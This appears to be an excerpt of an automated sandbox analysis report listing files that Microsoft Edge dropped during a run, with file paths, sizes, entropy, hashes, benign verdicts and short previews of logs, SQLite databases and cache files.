                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.801 f70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/07-07:19:03.803 f70 Recovering log #3.2025/01/07-07:19:03.809 f70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):327
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.103978624941258
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp49UN4q2PcNwi23oH+TcwtrQMxIFUtL4/c3JZmwl41czkwOcNwi23oH+Tcwtrb:7p49G4vLZYebCFUtL4+J/l41cz54ZYeL
                                                                                                                                                                                                                                                                                                MD5:81FD4B5385C5783F1BE2396A43CDF4D2
                                                                                                                                                                                                                                                                                                SHA1:9A4CE016F09699A393ACF8EF3ECFAEEC8590E293
                                                                                                                                                                                                                                                                                                SHA-256:F6039D6EC416DA600875A8DC988BCE08922151F845856AE3033C9FA48D587859
                                                                                                                                                                                                                                                                                                SHA-512:220888D6A30ABB92E5801E15989467F44F4C2F35920DE04AF23B60FCBAD6288265B5925345C7B9432E68590ACDCCA414E9758D436CC454E43C095831D0169825
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.801 f70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/07-07:19:03.803 f70 Recovering log #3.2025/01/07-07:19:03.809 f70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13380725945442903

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1443
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.830056552358141
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:3LakygvW6VpsAF4unxStLp3X2amEtG1ChqFBzVCzV7nTJxQKkOAM4:3LaEv7VzFULp2FEkChSVE5yHOp
                                                                                                                                                                                                                                                                                                MD5:DD984F2C46F07ECF22224E848A68CC3B
                                                                                                                                                                                                                                                                                                SHA1:E35EC24957E9EE2960F84B35C6EB588AC45AC1DD
                                                                                                                                                                                                                                                                                                SHA-256:5787A7BB1ED0B619225DE4401DBF3D0E6E2CE64D735975F05F2094DD5DBC4042
                                                                                                                                                                                                                                                                                                SHA-512:B8745E973791A9BFA4419E196042FBC10C2337D45640930321B0CF32797FA19ECE8E8E40D2A295045D6AF05BF0EB572D6B0992858BBE3DF769761D6764B9FCBE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SNSS........v.v............v.v......".v.v............v.v........v.v........v.v........v.v....!...v.v................................v.v.v.v1..,....v.v$...56698a45_aecf_4427_b4f7_6702d21d0905....v.v........v.v....9...........v.v....v.v........................v.v....................5..0....v.v&...{4B3AC14B-43E5-4896-86E8-9E7D502CE1B5}......v.v........v.v...........................v.v............v.v........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.........K..+....K..+.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):355
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.156157174115082
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp43T1yq2PcNwi23oH+Tcwt7Uh2ghZIFUtL43az1Zmwl43alRkwOcNwi23oH+T8:7p43T1yvLZYebIhHh2FUtL43O/l432Rf
                                                                                                                                                                                                                                                                                                MD5:6580BF88C7E7D7BE9011D8D67312603E
                                                                                                                                                                                                                                                                                                SHA1:3760FD08C2EF2ADEEA61469009F55735918D6F6E
                                                                                                                                                                                                                                                                                                SHA-256:141A4652E2B99FD907F440F40746900E8D9BE463C7E356162437ABDC8283ACF7
                                                                                                                                                                                                                                                                                                SHA-512:37F90DD237E851DBC047B6F7457F7F56998F9AB23E5E3F1B64D6476ADB9E60609753F3437EAB5B9D4373B4F9BC61FF2E1212BBD7B4B684FB081629B5549FAD5C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:02.945 a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/07-07:19:02.946 a74 Recovering log #3.2025/01/07-07:19:02.946 a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):355
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.156157174115082
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp43T1yq2PcNwi23oH+Tcwt7Uh2ghZIFUtL43az1Zmwl43alRkwOcNwi23oH+T8:7p43T1yvLZYebIhHh2FUtL43O/l432Rf
                                                                                                                                                                                                                                                                                                MD5:6580BF88C7E7D7BE9011D8D67312603E
                                                                                                                                                                                                                                                                                                SHA1:3760FD08C2EF2ADEEA61469009F55735918D6F6E
                                                                                                                                                                                                                                                                                                SHA-256:141A4652E2B99FD907F440F40746900E8D9BE463C7E356162437ABDC8283ACF7
                                                                                                                                                                                                                                                                                                SHA-512:37F90DD237E851DBC047B6F7457F7F56998F9AB23E5E3F1B64D6476ADB9E60609753F3437EAB5B9D4373B4F9BC61FF2E1212BBD7B4B684FB081629B5549FAD5C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:02.945 a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/07-07:19:02.946 a74 Recovering log #3.2025/01/07-07:19:02.946 a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0018164538716206493
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zEZlM:/M/xT02z
                                                                                                                                                                                                                                                                                                MD5:CB56B43041289CA4BFD7002A3C8F04B3
                                                                                                                                                                                                                                                                                                SHA1:B482CE30F15F6FC430DE9CB41AF0BB45C5933DB8
                                                                                                                                                                                                                                                                                                SHA-256:CD714930B4C252AA0992BBE3D5FC177BDBCBDA37EDD335585F5645F6C00D7946
                                                                                                                                                                                                                                                                                                SHA-512:B87CF51D6F21781F07156E85F5872C50B0B786DA2AD7ECDCDD43CC9E51CA9278BB3FF35BCDED2870E77DB6DFFE9CD474CF9C34FFDEF892D1A1DBD7D183113202
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):440
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.25291038737997
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:7p4xtvLZYebvqBQFUtL4VZ/l41uR54ZYebvqBvJ:7WXlYebvZgEVw1aoYebvk
                                                                                                                                                                                                                                                                                                MD5:EF41F5E4B8D1DCC8B3C1A0C6BFDAB00B
                                                                                                                                                                                                                                                                                                SHA1:BC6E8F71A2F5061D3BAC1B4DCCED728DBBD0CAA7
                                                                                                                                                                                                                                                                                                SHA-256:A3987336B58C3AD85425ED6B371DCFAFB875440F7725B2311FA3E620C2457134
                                                                                                                                                                                                                                                                                                SHA-512:C09CA6EC373873227FE6FF59019AA7BA35D107F7AEC0EBD4AF50CC835196624EFDD3951B48576F36A8DEA74831C75CD6710EC59D23FA3C54B647D2C1F3FEE0A5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.841 1194 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/07-07:19:03.842 1194 Recovering log #3.2025/01/07-07:19:03.845 1194 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):440
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.25291038737997
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:7p4xtvLZYebvqBQFUtL4VZ/l41uR54ZYebvqBvJ:7WXlYebvZgEVw1aoYebvk
                                                                                                                                                                                                                                                                                                MD5:EF41F5E4B8D1DCC8B3C1A0C6BFDAB00B
                                                                                                                                                                                                                                                                                                SHA1:BC6E8F71A2F5061D3BAC1B4DCCED728DBBD0CAA7
                                                                                                                                                                                                                                                                                                SHA-256:A3987336B58C3AD85425ED6B371DCFAFB875440F7725B2311FA3E620C2457134
                                                                                                                                                                                                                                                                                                SHA-512:C09CA6EC373873227FE6FF59019AA7BA35D107F7AEC0EBD4AF50CC835196624EFDD3951B48576F36A8DEA74831C75CD6710EC59D23FA3C54B647D2C1F3FEE0A5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.841 1194 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/07-07:19:03.842 1194 Recovering log #3.2025/01/07-07:19:03.845 1194 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\0632e261-4cd6-4369-a93b-48eec4233236.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\22053bd3-02b7-469b-9aaa-05f340684def.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\8b93fdbe-bc71-4466-a95b-912e9340cbd9.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF2f9d7.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF304f3.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\f748a09f-c9ca-4a3e-a546-084e83f6827a.tmp

                                                                                                                                                                                                                                                                                                Download File
